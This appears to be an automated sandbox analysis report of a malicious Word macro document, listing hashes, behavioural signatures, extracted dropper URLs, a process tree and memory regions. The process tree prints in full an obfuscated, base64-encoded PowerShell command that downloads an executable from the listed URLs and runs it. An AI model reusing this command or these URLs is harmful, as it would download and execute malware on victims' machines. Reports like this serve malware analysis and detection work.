Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-09-2024 14:08

General

  • Target

    eb7eac4bc393d5b1c406c52ba0dda1eb_JaffaCakes118.doc

  • Size

    170KB

  • MD5

    eb7eac4bc393d5b1c406c52ba0dda1eb

  • SHA1

    ca4f54ce2136b9ac15c80ec18a10362e6f069795

  • SHA256

    b8c7830a4a2390d6b31f40d0dd0958d1ee0844ac3dc20484bd00a9bc6ca87be7

  • SHA512

    fd3862de3a28e652b6ac5e591a56755c12e04953ca8578d365a4c709abc8f979a9eeb6c4a79fdb2a704a0c74069961650b3b7997736cbbaacbb6bc4f49f2999e

  • SSDEEP

    3072:R9ufstRUUKSns8T00JSHUgteMJ8qMD7gZYFESXiNBaZxPIp:R9ufsfgIf0pLWFESXiNIZxQp

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://shop.qihchina.com/validators/8/

exe.dropper

http://skoolkam.com/blog/5ji/

exe.dropper

http://shopmebom.webdungsan.com/wp-admin/1Oy/

exe.dropper

http://demo77.webdungsan.com/wp-admin/6m/

exe.dropper

https://wyyichen.com/wp-includes/W0N/

exe.dropper

http://94.24.72.63/wp-content/te/

exe.dropper

http://topupez.info/wp-includes/DEr/

Signatures

  • Blocklisted process makes network request 12 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eb7eac4bc393d5b1c406c52ba0dda1eb_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2696
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1700
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD JABRAHYAMABsAG4ANAA1AD0AKAAnAFEAOQAnACsAKAAnAHkAagA4ACcAKwAnAG0AOQAnACkAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAVQBzAGUAUgBwAHIATwBmAGkATABlAFwARAA1AFUAMABoAEYAMwBcAGwAdABWAEsATwBNAGUAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIAZQBjAHQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAGAAVQBSAGkAVABZAFAAUgBgAE8AYABUAGAATwBDAG8ATAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAJwApACsAJwAyACwAJwArACgAJwAgAHQAbAAnACsAJwBzADEAJwApACsAJwAxACwAJwArACgAJwAgAHQAbAAnACsAJwBzACcAKQApADsAJABFAHEAbABpAGQAXwByACAAPQAgACgAKAAnAFcAeQAnACsAJwBsACcAKQArACgAJwBpAHgAJwArACcAdgA1ACcAKQArACcAagAzACcAKQA7ACQAUQAyAGYANQB0ADYAbAA9ACgAJwBPACcAKwAoACcAcwAnACsAJwBiAGcAJwApACsAKAAnAHQAbQAnACsAJwBfACcAKQApADsAJABLAHUANQBkAGoAMQBkAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHsAJwArACcAMAB9AEQAJwArACcANQB1ADAAaABmADMAewAwAH0ATAB0AHYAawBvAG0AZQB7ACcAKwAnADAAfQAnACkALQBmACAAIABbAEMAaABBAFIAXQA5ADIAKQArACQARQBxAGwAaQBkAF8AcgArACgAJwAuAGUAJwArACcAeABlACcAKQA7ACQASQBqAHMAcwA1AGQAdgA9ACgAJwBLACcAKwAnADEAJwArACgAJwBhADcAYQAnACsAJwBjADIAJwApACkAOwAkAFYAZwB3AG4ANgBoADgAPQAmACgAJwBuAGUAJwArACcAdwAtACcAKwAnAG8AYgBqAGUAYwB0ACcAKQAgAE4ARQBUAC4AdwBFAEIAQwBsAGkAZQBOAHQAOwAkAE4AMQA2ADUAMQBoAHUAPQAoACcAaAAnACsAJwB0ACcAKwAnAHQAcAAnACsAKAAnADoALwAvACcAKwAnAHMAaAAnACsAJwBvAHAALgBxAGkAJwApACsAKAAnAGgAYwBoAGkAbgBhACcAKwAnAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC8AdgBhAGwAaQBkAGEAJwApACsAJwB0ACcAKwAoACcAbwAnACsAJwByAHMALwAnACkAKwAoACcAOAAvACoAJwArACcAaAAnACkAKwAoACcAdAAnACsAJwB0AHAAJwArACcAOgAvAC8AcwBrAG8AJwArACcAbwBsAGsAYQBtACcAKQArACcALgBjACcAKwAoACcAbwAnACsAJwBtAC8AJwArACcAYgBsAG8AJwArACcAZwAvADUAagAnACkAKwAoACcAaQAvACoAaAAnACsAJwB0AHQAcAAnACsAJwA6AC8ALwAnACsAJwBzACcAKQArACgAJwBoACcAKwAnAG8AcAAnACkAKwAoACcAbQAnACsAJwBlAGIAbwBtACcAKQArACcALgB3ACcAKwAoACcAZQBiAGQAdQAnACsAJwBuACcAKwAnAGcAcwAnACkAKwAoACcAYQAnACsAJwBuAC4AYwBvACcAKQArACgAJwBtAC8AdwAnACsAJwBwAC0AYQAnACsAJwBkAG0AJwApACsAKAAnAGkAJwArACcAbgAvACcAKQArACgAJwAxAE8AeQAvACoAJwArACcAaAAnACsAJwB0ACcAKwAnAHQAcAA6AC8ALwAnACkAKwAoACcAZABlAG0AJwArACcAbwAnACkAKwAnADcAJwArACcANwAuACcAKwAnAHcAJwArACcAZQAnACsAJwBiACcAKwAoACcAZAAnACsAJwB1AG4AZwAnACkAKwAnAHMAYQAnACsAJwBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACsAJwAvAHcAJwApACsAJwBwACcAKwAnAC0AJwArACgAJwBhAGQAbQAnACsAJwBpAG4ALwA2ACcAKQArACgAJwBtAC8AJwArACcAKgAnACsAJwBoAHQAdABwAHMAJwArACcAOgAvAC8AdwB5AHkAaQBjAGgAZQAnACsAJwBuAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwBwACcAKwAnAC0AaQBuAGMAJwArACcAbAAnACkAKwAoACcAdQBkAGUAcwAvAFcAMABOAC8AJwArACcAKgBoACcAKwAnAHQAJwApACsAKAAnAHQAcAA6AC8AJwArACcALwA5ACcAKQArACgAJwA0ACcAKwAnAC4AMgAnACkAKwAoACcANAAnACsAJwAuACcAKwAnADcAMgAuADYAMwAvACcAKQArACgAJwB3ACcAKwAnAHAALQAnACsAJwBjAG8AbgB0AGUAJwApACsAKAAnAG4AdAAvACcAKwAnAHQAZQAnACkAKwAoACcALwAqAGgAJwArACcAdAAnACkAKwAoACcAdABwADoAJwArACcALwAvAHQAbwAnACsAJwBwAHUAcABlAHoAJwApACsAKAAnAC4AaQAnACsAJwBuAGYAbwAnACkAKwAoACcALwAnACsAJwB3AHAALQBpAG4AJwArACcAYwBsAHUAJwApACsAJwBkACcAKwAnAGUAcwAnACsAJwAvACcAKwAoACcARAAnACsAJwBFAHIALwAnACkAKQAuACIAUwBQAGAAbABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABOAGsAZgBkAHkANABwAD0AKAAnAFkAaQAnACsAJwAzAHAAJwArACgAJwA2AHoAJwArACcAZgAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFgAbgB2AHEAYwBnAHQAIABpAG4AIAAkAE4AMQA2ADUAMQBoAHUAKQB7AHQAcgB5AHsAJABWAGcAdwBuADYAaAA4AC4AIgBkAGAATwB3AG4AYABsAE8AYQBEAGAARgBJAEwAZQAiACgAJABYAG4AdgBxAGMAZwB0ACwAIAAkAEsAdQA1AGQAagAxAGQAKQA7ACQARwA3AGoAdgAzAGoAawA9ACgAKAAnAEUAJwArACcAcQBwACcAKQArACgAJwA0ACcAKwAnADUAcQB4ACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEsAdQA1AGQAagAxAGQAKQAuACIATABgAEUATgBHAHQASAAiACAALQBnAGUAIAAzADAAMgA1ADcAKQAgAHsALgAoACcASQBuAHYAbwBrAGUAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAoACQASwB1ADUAZABqADEAZAApADsAJABJAHkAagBoADgAZAB0AD0AKAAoACcAUgB1AHYAbQAnACsAJwBmACcAKQArACcANQB6ACcAKQA7AGIAcgBlAGEAawA7ACQAQgB4AGYANABnADkAagA9ACgAKAAnAFAAJwArACcAOAAnACsAJwBoAG8AdwBfACcAKQArACcAcwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEcAeQB0AGIAOAAzAG0APQAoACcAUwAyACcAKwAnAGQAMQAnACsAKAAnAHoAJwArACcAaQBhACcAKQApAA==
      1⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2892

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      bfb6351b300d3f3cd0752d51f8bc6f98

      SHA1

      0bc6c9f43ef5b4658c074fa3c8e4e488d8ad948d

      SHA256

      e9fab617b7b11f75790f7addbade4926aea1cc09aa6c9ef3d08e60178e0ed98d

      SHA512

      ffa7ed499a8b4fd131909651256829fed04d1857e6fa1406fd95c8b80ded0115739c23336586ea36abf208011df292efb754320b72ec94ff65113969a9ca866d

    • memory/2696-47-0x0000000005AE0000-0x0000000005BE0000-memory.dmp

      Filesize

      1024KB

    • memory/2696-82-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2696-5-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-83-0x000000007152D000-0x0000000071538000-memory.dmp

      Filesize

      44KB

    • memory/2696-28-0x0000000005AE0000-0x0000000005BE0000-memory.dmp

      Filesize

      1024KB

    • memory/2696-27-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-20-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-18-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-17-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-16-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-15-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-14-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-13-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-12-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-11-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-10-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-9-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-46-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-7-0x0000000005CE0000-0x0000000005DE0000-memory.dmp

      Filesize

      1024KB

    • memory/2696-6-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-19-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-0-0x000000002FB31000-0x000000002FB32000-memory.dmp

      Filesize

      4KB

    • memory/2696-29-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-2-0x000000007152D000-0x0000000071538000-memory.dmp

      Filesize

      44KB

    • memory/2696-8-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-42-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-41-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-40-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-39-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-38-0x0000000005AE0000-0x0000000005BE0000-memory.dmp

      Filesize

      1024KB

    • memory/2696-37-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-33-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-32-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-31-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-30-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-59-0x000000007152D000-0x0000000071538000-memory.dmp

      Filesize

      44KB

    • memory/2696-60-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-61-0x0000000005AE0000-0x0000000005BE0000-memory.dmp

      Filesize

      1024KB

    • memory/2696-62-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-63-0x0000000005AE0000-0x0000000005BE0000-memory.dmp

      Filesize

      1024KB

    • memory/2696-64-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/2696-65-0x0000000005AE0000-0x0000000005BE0000-memory.dmp

      Filesize

      1024KB

    • memory/2696-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2892-54-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

      Filesize

      32KB

    • memory/2892-53-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

      Filesize

      2.9MB